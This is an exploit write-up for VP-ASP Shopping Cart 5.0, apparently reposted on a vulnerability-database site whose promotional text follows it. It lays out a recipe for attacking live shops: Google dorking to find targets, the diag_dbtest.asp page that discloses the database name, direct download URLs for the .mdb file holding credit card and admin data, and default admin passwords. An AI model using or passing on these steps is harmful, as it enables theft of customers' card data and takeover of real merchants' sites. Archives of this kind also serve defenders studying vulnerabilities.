`VP-ASP Shopping Cart Version 5.0 Google style by fris <[email protected]>
Finding VP-ASP 5.00 Sites in Google:
In google type:
intitle:VP-ASP Shopping Cart 5.00
You will find many websites with VP-ASP 5.00 cart software installed
Now lets goto the exploit
the page will be like this:
****://***.victim.com/shop/shopdisplaycategories.asp
The exploit is : diag_dbtest.asp
so you want to do this:
****://***.victim.com/shop/diag_dbtest.asp
A page will appear that contains:
xDatabase
shopping140
xDblocation
resx
xdatabasetypexEmailxEmailNamexEmailSubjectxEmailSystemxEmailTypexOrdernumber
The most important thing here is xDatabase
xDatabase: shopping140
ok now the url will be like this:
****://***.victim.com/shop/shopping140.mdb
if you didn't download the db
try this while there is db location.
xDblocation
resx
the url will be:
****://***.victim.com/shop/resx/shopping140.mdb
If u see the error message you can try this:
****://***.victim.com/shop/shopping500.mdb
download the mdb file and you should be able to open it with any mdb file
viewer, most people have ms access for you windows people, open office
for you *nix people, or you can goto download.com and get a .mdb
viewer.
inside the .mdb you should be able to find credit card information.
and you should even be able to find the admin username and password for
the website.
the admin login page is usually located at
****://***.victim.com/shop/shopadmin.asp
if you cannot find the admin username and password in the mdb file or you
can but it is incorrect, or you cannot find the mdb file at all then try
to find the admin login page and enter the default passwords which are
Username: admin
password: admin
or
Username: vpasp
password: vpasp
------
eof.
shouts out to mosthated, ghettodmx, evian s sim, ragz, TFreak, and Paige
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation